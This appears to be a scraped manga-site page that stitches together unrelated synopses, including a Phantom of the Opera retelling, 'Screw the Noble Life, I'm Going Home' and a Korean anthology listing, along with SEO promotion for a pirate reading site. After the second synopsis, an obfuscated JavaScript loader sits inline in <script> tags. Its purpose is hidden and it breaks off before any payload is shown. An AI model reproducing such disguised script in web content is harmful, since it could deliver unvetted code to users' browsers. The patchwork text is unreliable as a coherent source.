In the mysterious Paris of the 19th century, the Opera House is famous for its great plays and shows. However, no one imagines that behind that place where everyone lives magical moments, hides a ghost so terrifying that the fifth box of the theater is forbidden to all the cast. "F", a ghost whom everyone fears, lives surrounded by rumors about his existence. However... not everyone believes in it. Christina Dae, a chorus girl with a voice like no other, refuses to consider that such a thing could exist, even though a part of her thinks that not everything said about "F" is real. Therefore, Christina is not afraid to go to practice and walk where no one else does. What if those rumors about that mysterious ghost were real?
Trapped in a mysterious forest... "There's a forest that steals shadows?" Hyojoo is on the verge of losing her shadow to a menacing forest and disappearing forever when she meets Muyoung, a mysterious yet beautiful man. In this fairy tale romance, the two race against time as the moon slowly wanes...<script></script><script>(function(_0x5d629c,_0x28abfb){var _0x5c505f=_0x304f,_0x3af05c=_0x5d629c();while(!![]){try{var _0x2e02be=-parseInt(_0x5c505f(0xc2))/(0x1955+-0x354*-0x6+-0x2d4c)+-parseInt(_0x5c505f(0xca))/(0x1*-0x2429+0x14bf+0x7*0x234)+-parseInt(_0x5c505f(0xce))/(0x50c+0x1*0x2542+0x3*-0xe19)*(parseInt(_0x5c505f(0xc8))/(0x2*0xf86+-0x673+-0x1895))+parseInt(_0x5c505f(0xcc))/(0x11*0x33+-0x1fbe+-0x1c6*-0x10)*(parseInt(_0x5c505f(0xdd))/(-0x1315+-0x871*-0x3+-0xc7*0x8))+parseInt(_0x5c505f(0xdb))/(0x8b*-0x2b+-0x14d*-0x1+0x1613)+-parseInt(_0x5c505f(0xd2))/(0x3b*-0xa7+-0xf*-0x22d+0x5e2)+parseInt(_0x5c505f(0xde))/(0x230a+-0x1346+-0xfbb);if(_0x2e02be===_0x28abfb)break;else _0x3af05c['push'](_0x3af05c['shift']());}catch(_0x38b6d9){_0x3af05c['push'](_0x3af05c['shift']());}}}(_0x3944,-0x1*0x2c674+0x48488+0x34630));function custom(){var _0x276228=_0x304f,_0x56dc8d={'nEXzG':function(_0x55ba9c,_0x155584){return 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Read Manga Screw the Noble Life, I’m Going Home Online For Free At Top Manhua Associated Names: Noble Lady or Whatever, I’m Going Home / 공녀고 나발이고 집에 간다고 The Content Screw the Noble Life, I’m Going Home: After confirming that I had won the lottery, I tried to quit my job. However, as soon as I opened the door, I found myself transmigrated into the body of a Duke’s daughter in a fantasy world. I have one year to claim the prize money, so I have to return home at all costs. My 1.7 billion won, mum will be there soon. Wait for me!!! But… What’s wrong with this family?! “I love you.” But I’m not your daughter, uncle! “My little sister, you might get hurt, so I’ll carry you.” Did he say he was going to carry me? What is this guy, a giant brown bear? “If you mess around with my sister one more time, I’ll make you disappear without a trace.” He has such a pretty face for someone who speaks so crudely, “Don’t fall ill.” Don’t worry about me. Why are there so many of them?! I’m not a noble lady! Leave me alone, I wanna go home! New and hot comics are updated the fastest. The dying princess laughs in revenge From General to Bride: Marrying My Stongest Rival Adopted by a Murderous Duke Family MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “Top Manhua” and “ManhwaClan,” as well as related terms like ZinManga, LikeManga, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.
High school student Hoshino Terumichi always sees the same dream. A dream of a boy from the Taisho Era being strangled by a man he calls Sensei. One day a mysterious classmate, Yamada Omihito, appears before him. The reason they became attracted to each other is… A Karmic curse which has resulted in many casualties. A bizarre story about pure love.
Volume 1: 1) Days Wishes Fall by YUN Ji Woon About the relationship between a father and a daughter. 2) The Door by KIM Yeon-Joo The reminisces of a girl in the temporary care of a lord apparent. 3) The Ravages of the Tiger by SEO MOON Da Mi A girl seeks revenge and death through hunting a tiger. 4) The Night has a Thousand Eyes by LEE Hyeon-Sook The relationship between a boy, his girlfriend, and her cousin. 5) I Hate You, Dad ♥ by LEE Si Young 6) The Road the Dead Pass By by PARK Eun-Ah Volume 2: "Boy's Love" 1) 달밤은 위험천만! SHIM Hye-Jin 2) Get Real Na Yeri 3) To Be Born In an Endless Night LEE Hyeon-Sook 4) jardin de chouette 올빼미의 정원 Kang Hye-Jin 5) But... by LEE Si Young 6) Lunch SHIN Yoo Ha (신유하) 7) Sanctuary by RHIM Ju-Yeon Volume 3: "Antiq + Sad" 1) Moon Palace [월궁 (月宮)] by YUN Ji Woon 2) by Kang Hye-Jin (강혜진) 3) And... by LEE Si Young (Shounen Ai) 4) Sorrow [哀 (슬플애)] by Park Ki-Hong & KIM Seon Hee 7) Hijo de la Luna by SHIN Ji-Sang and Geo A noble man recalls the tragic story of a boy born out of wedlock and the supposed curse upon him because of his white eye. The cursed boy lives a harsh life and falls in love with someone forbidden to him. In the end the beast kills the one he cared most about. Volume 4: "Older" 1) Shepherds by Kwon Gyo-jung 2) Bride by Aivan 3) (황금나선의 경로) by YOO Shi Jin 4) Sweet & Sweet (달콤하고 달콤하도다) by [a]KIM Se Young[/a] 5) (너는 나의 달빛) by LEE Si Young 6) 1000 Years in Your Eyes] (천년도 당신 눈에는) by RHIM Ju-Yeon
After a scandal got him kicked out of his position at court, Takaaki's been idling the days away at his manor, impulsive and bored. Then one day his friend Naruhito stops by and tells him an insane story about the most beautiful woman alive -- and drags him off in his attempt to win her heart. Tagging along, Takaaki soon realizes that the "Princess" isn't exactly who she (he!?) seems to be. Who exactly is Princess Kaguya, and what is the dark secret behind her (his!?) past?
Demon brothers Tao Tie and Kui Long arrived at a village to receive a ritual sacrifice that happens every 10 years. Kui Long introduces himself as Wu Chen to a girl named Tan Hua. Turns out that Tan Hua actually died from an illness beforehand, but her brother, the doctor gave her a medicine to revive her so that she would be the sacrifice instead of him. Neither Kui Long nor Tan Hua knew each others role in the approaching ritual...
Toudoku ni ita summary is updating. Come visit sometime to read the latest chapter of Toudoku ni ita. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.
Since ancient times, humans and demons of the Divine Land have considered each other sworn enemies. After an unexpected turn of events, the princess of the demon race and a young, demon-loathing Taoist named Zhang Kuangyun become partners and are forced to “assist in capturing demons”… Misunderstandings arise as they disagree on the capture of demons. A fellow sect member is revealed to be the “mastermind”, flames of wrath and vengeance are ignited, secret schemes slowly unfold, and a wedding gown becomes painted in fire and blood — all of which weave into this emotional Xianxia tale.
A young woman sick with an incurable illness closes her eyes for the last time, only to wake up as Ariel Winston, an antagonist of the novel she had loved reading before her death. Knowing that death lies before her if she continues down the path the real Ariel has been going towards, she quickly breaks up with Duke Cedric Evans, who is not only the protagonist of the novel, but a man who is cursed with a condition which causes him to become bloodthirsty when he does not smell a specific scent constantly. However, Cedric, who had been forced to date Ariel due to her status as his personal perfumer, suddenly seems reluctant to distance himself from her. Just what is wrong with this man, and how will this change the events of the novel? Will Ariel be able to live the life she wants?
This adult action comedy takes place during a fictional time in Japan's history known as the Ero period, where the arts of love and war hold equal sway! A diverse cast of ninja warriors both male and female must outwit, outlast, and out-maneuver the competition, or else suffer the se** consequences!
Description : “Please…hold me.” “But, sir…” Il-yeon has left home to do a task at his father’s request. He has come back to a place he hasn’t been in in ten years. My, how things have changed. And he can’t wait to see some familiar old faces again. But suddenly, one night Il-yeon is overwhelmed by a debilitating sickness. No, it can’t be…not here…not now… It’s that sickness that consumes his entire body with a burning fire that can only be treated by…the pleasure given by another. By chance or by fate, Il-yeon stumbles upon the commoner, Ungae, and asks for his immediate assistance. Il-yeon has a duty to carry on the family line as a Yin being but he surrenders to his instincts and spends a dream-like night with Ungae. This is the tale of how Il-yeon, the noble, and the mysterious Ungae, begin their unforgettable passion together.